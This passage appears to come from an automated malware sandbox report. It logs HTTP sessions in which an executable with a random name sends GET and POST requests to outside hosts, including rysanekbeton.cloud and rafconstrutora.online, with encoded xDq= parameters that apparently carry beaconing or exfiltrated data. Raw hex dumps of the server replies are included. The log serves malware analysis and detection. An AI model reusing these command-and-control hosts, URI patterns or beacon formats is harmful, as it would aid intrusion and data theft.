wr6+2CXS6jV7yVonSzdp7icYhjGh95IJY0Utpl1qTbpwWy5BSm5PJUlzOakWuelbVOziGsJJSWYk6/ZaiDIoZ6SDoSlbU+j90g1TYXimlmeoCbzCfBmEg7XOaDTkBjDE+gHPG7/LYqnrNc4ZfvuS3nL5qiVkjTmoG7guMiIOoyKMFcboLKeCwtDR [TRUNCATED]
Nov 20, 2024 04:20:53.865087986 CET	292	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 20 Nov 2024 03:20:53 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	64859	81.2.196.19	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:20:55.787776947 CET	474	OUT	GET /3g99/?xDq=RytNeZ1XRv60mT66OsZ14/Z53Dl0UWWckwx6IFoxcwMb7EGpIrhq/2Ikbe8axKxY7FzhI3ANlUXRki/bAaSaeyuYJYNKRROQR84NXiU2Qicm7Q5G8aT8zzM=&Lhx=fPAh7htHyFPl- HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.rysanekbeton.cloud User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 20, 2024 04:20:56.417972088 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 20 Nov 2024 03:20:56 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	64860	188.114.96.3	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:21:01.515392065 CET	757	OUT	POST /0xli/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 200 Host: www.rafconstrutora.online Origin: http://www.rafconstrutora.online Referer: http://www.rafconstrutora.online/0xli/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 53 67 59 33 6a 51 54 36 61 51 30 70 61 57 6e 49 79 62 4d 67 6d 48 6e 39 35 31 48 41 43 4b 4f 44 56 51 6f 78 58 39 35 6c 32 65 77 61 41 79 55 59 55 32 77 38 46 71 34 69 6e 65 6f 62 5a 39 5a 6c 58 41 58 59 76 46 4d 61 33 7a 6c 62 77 49 46 72 64 77 4f 75 38 37 53 2f 71 54 6d 33 4a 67 72 57 48 79 48 2b 75 36 50 46 6d 5a 65 73 41 51 32 67 66 76 4c 6c 79 6e 78 43 79 49 42 57 66 41 76 6b 52 38 33 69 32 54 6d 53 45 2b 66 34 64 45 70 56 73 59 4c 31 56 61 70 4e 4c 42 63 69 2b 59 6b 79 4f 67 38 4d 79 65 4a 36 78 4f 36 46 52 38 51 47 43 31 37 42 65 4a 79 6d 33 70 35 77 76 6f 34 57 56 77 3d 3d Data Ascii: xDq=SgY3jQT6aQ0paWnIybMgmHn951HACKODVQoxX95l2ewaAyUYU2w8Fq4ineobZ9ZlXAXYvFMa3zlbwIFrdwOu87S/qTm3JgrWHyH+u6PFmZesAQ2gfvLlynxCyIBWfAvkR83i2TmSE+f4dEpVsYL1VapNLBci+YkyOg8MyeJ6xO6FR8QGC17BeJym3p5wvo4WVw==
Nov 20, 2024 04:21:02.027595997 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 20 Nov 2024 03:21:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D44uPqJPV572oKOf5Am4ERzhL1KXePr2Y9lkCx%2F8WFK0Zt9OQ073%2B7puYDyCvLNXIRl7Y%2BQLrzPquYhW2AkruNNUoV0ofpwqEa9%2FjJ3buEDYgnWv%2BWT5WjVo39Heaizh3%2BNozIiw8CFeej2q"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e554ebadce8c32d-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1675&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=757&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED] Data Ascii: 33fnF={E@I/M&@{V(C,)oc@B/VPQ$QqZ;a\|_@2}"P'D@\v+B@1D\|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf\|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>2Cr-F
Nov 20, 2024 04:21:02.027654886 CET	471	IN	Data Raw: 2e 8c 16 e2 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d 53 75 5d a2 f4 d4 e8 42 3e 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15 8b 71 17 2e ce 54 9c b1 34 73 b0 22 f2 ec 9d aa 47 95 b1 23 cd 2c f6 ed f2 77 25 72 81 e8 ff Data Ascii: .Z.a2C-Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp wVKz =tddX
Nov 20, 2024 04:21:02.028090954 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	64861	188.114.96.3	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:21:04.053035021 CET	777	OUT	POST /0xli/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 220 Host: www.rafconstrutora.online Origin: http://www.rafconstrutora.online Referer: http://www.rafconstrutora.online/0xli/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 53 67 59 33 6a 51 54 36 61 51 30 70 62 32 33 49 78 34 30 67 6a 6e 6e 36 32 56 48 41 4d 71 4f 48 56 51 73 78 58 38 4e 31 78 74 59 61 4f 78 41 59 56 33 77 38 45 71 34 69 70 2b 70 77 48 4e 5a 75 58 41 61 6e 76 48 6f 61 33 77 5a 62 77 4a 31 72 64 6e 53 70 39 72 54 5a 68 7a 6d 50 48 41 72 57 48 79 48 2b 75 2b 6e 76 6d 59 36 73 41 41 47 67 66 4f 4c 6d 2f 48 78 44 69 34 42 57 49 77 75 76 52 38 33 41 32 53 71 34 45 39 6e 34 64 46 5a 56 73 4b 6a 71 61 61 6f 45 55 52 64 54 75 59 30 34 47 51 6f 41 74 6f 6b 55 36 75 36 45 5a 61 64 63 54 45 61 57 4d 4a 57 56 71 75 77 45 69 72 46 66 4f 30 48 4c 70 75 41 44 6c 51 50 36 75 6f 54 49 43 72 4f 2f 51 71 77 3d Data Ascii: xDq=SgY3jQT6aQ0pb23Ix40gjnn62VHAMqOHVQsxX8N1xtYaOxAYV3w8Eq4ip+pwHNZuXAanvHoa3wZbwJ1rdnSp9rTZhzmPHArWHyH+u+nvmY6sAAGgfOLm/HxDi4BWIwuvR83A2Sq4E9n4dFZVsKjqaaoEURdTuY04GQoAtokU6u6EZadcTEaWMJWVquwEirFfO0HLpuADlQP6uoTICrO/Qqw=
Nov 20, 2024 04:21:04.683798075 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 20 Nov 2024 03:21:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xdaJX0zMneAvOXn7gyY6L0sRYJccOIEvgnaw%2FZ8x0WmE97eMUFVdZNT5hhXkpjMepPoXoEBrl0QVjvuzlaj%2FGWNS%2F9dQyMEztxdttQ72m5SrzLnNzuIOZ0DgwOMI0s7%2FX7vssktwdN8%2BBT01"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e554ecaee9342ca-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1801&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=777&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 33 34 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED] Data Ascii: 34bnF={E@I/M&@{V(C,)oc@B/VPQ$QqZ;a\|_@2}"P'D@\v+B@1D\|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf\|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>2Cr-F.
Nov 20, 2024 04:21:04.683851004 CET	469	IN	Data Raw: 16 e2 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d 53 75 5d a2 f4 d4 e8 42 3e 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15 8b 71 17 2e ce 54 9c b1 34 73 b0 22 f2 ec 9d aa 47 95 b1 23 cd 2c f6 ed f2 77 25 72 81 e8 ff 13 b1 Data Ascii: Z.a2C-Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp wVKz =tddX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	64862	188.114.96.3	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:21:06.607306004 CET	10859	OUT	POST /0xli/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10300 Host: www.rafconstrutora.online Origin: http://www.rafconstrutora.online Referer: http://www.rafconstrutora.online/0xli/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 78 44 71 3d 53 67 59 33 6a 51 54 36 61 51 30 70 62 32 33 49 78 34 30 67 6a 6e 6e 36 32 56 48 41 4d 71 4f 48 56 51 73 78 58 38 4e 31 78 74 41 61 4f 42 63 59 55 55 49 38 65 71 34 69 33 75 6f 58 48 4e 5a 76 58 41 53 6a 76 48 55 6b 33 32 56 62 77 72 39 72 4a 46 36 70 33 72 54 5a 75 54 6d 30 4a 67 72 35 48 79 57 33 75 36 44 76 6d 59 36 73 41 43 75 67 59 66 4c 6d 39 48 78 43 79 49 42 4b 66 41 75 48 52 38 75 39 32 53 2b 43 45 4e 48 34 64 6c 4a 56 72 2f 2f 71 54 61 6f 4b 58 52 64 4c 75 59 35 69 47 51 31 7a 74 73 6c 50 36 73 6d 45 62 76 4d 6c 4c 30 4f 52 4f 2f 43 6f 38 66 55 48 6c 70 35 54 49 58 37 66 76 72 63 64 77 52 4c 6e 6c 6f 50 4d 5a 2b 47 49 52 76 2b 4a 46 44 74 62 4d 76 43 71 35 5a 39 54 71 6b 48 4c 43 36 33 71 73 32 37 54 6d 4e 6c 72 39 44 75 6e 55 49 6f 70 38 39 64 6e 68 57 43 79 39 76 71 77 69 68 78 6f 59 69 66 56 46 2b 49 65 47 66 73 4c 50 78 32 37 54 2f 4f 61 53 54 44 65 2b 36 39 58 73 44 6f 56 75 41 36 4b 36 72 42 57 52 66 56 6f 48 34 68 77 35 54 53 32 49 69 49 78 77 2f 44 43 5a 35 52 69 38 34 [TRUNCATED] Data Ascii: xDq=SgY3jQT6aQ0pb23Ix40gjnn62VHAMqOHVQsxX8N1xtAaOBcYUUI8eq4i3uoXHNZvXASjvHUk32Vbwr9rJF6p3rTZuTm0Jgr5HyW3u6DvmY6sACugYfLm9HxCyIBKfAuHR8u92S+CENH4dlJVr//qTaoKXRdLuY5iGQ1ztslP6smEbvMlL0ORO/Co8fUHlp5TIX7fvrcdwRLnloPMZ+GIRv+JFDtbMvCq5Z9TqkHLC63qs27TmNlr9DunUIop89dnhWCy9vqwihxoYifVF+IeGfsLPx27T/OaSTDe+69XsDoVuA6K6rBWRfVoH4hw5TS2IiIxw/DCZ5Ri845Ru8atxhHpZbiPmerrn7V1yB71kicPfZcf9WohXmPhuY0bvbtqTJXadL87POpz+VyKBqlnA5NPx/E/FpVtoXN/2/fA+QdZh0ZFd0k3VOoFhH+6t6xbVB66ZXHaMYPZ7mOhfhBMqTXchL74SqU3FQf9tEh8KMRZrvj9dTbwePepp1PNh1X/s/cO8htmOvUTf5qHlSd6kOjd584lLlisrHSpbYQD3AT70VuqNtoW8NIkkqpSCRHXb3asFZjRElqt0QNqqe6rHmAxfOG4ZvSqvduoC1viCEVcHWMKnlaxP/sIToF/xN0ZEe0b/X3dWFElD8YpJ9bezhE+2hUObFx+//CK9yKQ2nbYBuQAEV8OmirTE04hR/sKAcC7DL3qqgCxc3C3U2rT9BZjDaPiDcY3VH9MOrB5yxtXlim7+1qk7zJ9PW7Te2Zomtp6i2ImDFmLbDzj3Md7qhrywjiDP1PYdoM0OJNFj8oA86XrMCzpcwibzmjYx5TQzB0wrhafEn+jyJqMGx6ek91BoqeDW2guu0JJRlwD7oXx09BTeTByQONlUX2/1YsY+wPTzK0a9Xl7LrBaQqQAeD+VWBu5rH81jrmkOWffH9bT1eKdmMr9HmNq+7g6z15XVvdNQjJGnqwo+1t6wEHZB58dAm3QiTjZNMgcgv/crHbeEwqR [TRUNCATED]
Nov 20, 2024 04:21:07.141448021 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 20 Nov 2024 03:21:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GPS%2FTD0LMdBkLdKHb6F5koGMYBT%2F1ZYX1HMAY5kM%2FZc01J4q66LhQLSRnJRMWCT91%2BXZejBh1v7MYyNVXcaq1IppPIysJFG2OoQsGzPQODAostfoM5cxIbJxG7LffdMzZwZSXNv6QPo0c9az"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e554edacef98c81-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1960&sent=3&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10859&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED] Data Ascii: 33fnF={E@I/M&@{V(C,)oc@B/VPQ$QqZ;a\|_@2}"P'D@\v+B@1D\|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf\|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>2Cr-F.
Nov 20, 2024 04:21:07.141499043 CET	475	IN	Data Raw: 8c 16 e2 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d 53 75 5d a2 f4 d4 e8 42 3e 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15 8b 71 17 2e ce 54 9c b1 34 73 b0 22 f2 ec 9d aa 47 95 b1 23 cd 2c f6 ed f2 77 25 72 81 e8 ff 13 Data Ascii: Z.a2C-Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp wVKz =tddX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	64863	188.114.96.3	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:21:09.144798994 CET	477	OUT	GET /0xli/?xDq=fiwXgneLShVjQCrL4aAUmgr67nbTTs+FPQo9HslC8d9LCicIVxdgVPkWu4N9YPZNTEC7g2Z77mR61ZpsKE291b6+nh6+OhPQfROIutba2cindDDWBeD84Ws=&Lhx=fPAh7htHyFPl- HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.rafconstrutora.online User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 20, 2024 04:21:09.722959042 CET	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 20 Nov 2024 03:21:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=px7mdXNrtM2LuuYgiNyrvKheGfh%2BPuM%2BgBqYSf7G7T%2FTm4uKtTdJmB5VvQawTHKyhHgm5ej%2BCXCEDvvzVRFR6avtVJK78KSDkjWbEfEl5znDbjfURr691MIoQ%2BJ3WsoXI4mo9mnFZzXQadBT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e554eeaaf354259-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2278&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=477&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 33 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d [TRUNCATED] Data Ascii: 939<!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortc
Nov 20, 2024 04:21:09.723014116 CET	1236	IN	Data Raw: 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 Data Ascii: ut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon"
Nov 20, 2024 04:21:09.723052979 CET	727	IN	Data Raw: 70 73 2c 3c 2f 73 74 72 6f 6e 67 3e 3c 62 72 3e 4e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 6d 6f 73 3c 62 72 3e 65 73 73 61 20 70 c3 a1 67 69 6e 61 21 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 70 3e 50 61 72 65 63 65 20 71 75 65 20 61 20 Data Ascii: ps,</strong><br>No encontramos<br>essa pgina!</h1> <p>Parece que a pgina que voc est procurando foi movida ou nunca existiu, certifique-se que digitou o endereo corretamente ou seguiu um link vlido.</p> <a h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	64864	206.238.89.119	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
